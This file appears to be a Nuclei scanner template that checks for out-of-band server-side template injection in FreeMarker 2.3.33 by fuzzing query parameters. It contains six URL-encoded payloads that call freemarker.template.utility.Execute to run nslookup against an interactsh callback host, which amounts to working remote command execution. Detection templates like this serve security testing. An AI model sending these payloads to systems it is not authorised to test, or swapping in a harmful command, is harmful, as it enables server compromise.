id: freemarker-oob
info:
name: Freemarker 2.3.33 - Out of Band Template Injection
author: 0xAwali,DhiyaneshDK,ritikchaddha
severity: high
reference:
- https://mvnrepository.com/artifact/org.freemarker/freemarker
- https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#freemarker---code-execution
metadata:
verified: true
tags: ssti,dast,oast,oob,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- "%3c%23assign%20rce%3d%22freemarker.template.utility.Execute%22%3fnew()%3e%20%0d%0a%24%7b%20rce(%22nslookup%20-type=SRV%20{{interactsh-url}}%22)%20%7d"
- "%3c%23assign%20rce%3d%22freemarker.template.utility.Execute%22%3fnew()%3e%20%0d%0a%24%7b%20rce(%22nslookup%20-type=SRV%20{{interactsh-url}}%22)%20%7d"
- "[#assign%20ex%20=%20%27freemarker.template.utility.Execute%27?new()]${%20ex(%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22)}"
- "${%22freemarker.template.utility.Execute%22?new()(%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22)}"
- "#{%22freemarker.template.utility.Execute%22?new()(%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22)}"
- "[=%22freemarker.template.utility.Execute%22?new()(%22nslookup%20-type%3DSRV%20{{interactsh-url}}%22)]"
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{injection}}"
matchers:
- type: dsl
name: request-matcher
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(interactsh_request,'srv')"
condition: and
# digest: 4a0a0047304502202b533c2fc497cb5f4aea5ee153daddc845b4842f7d720cce22180dbed1d863930221009f66d4268153e923175756d1f615947f9da0febc97d2d1ebfdba84b6d3644866:922c64590222798bb761d5b6d8e72950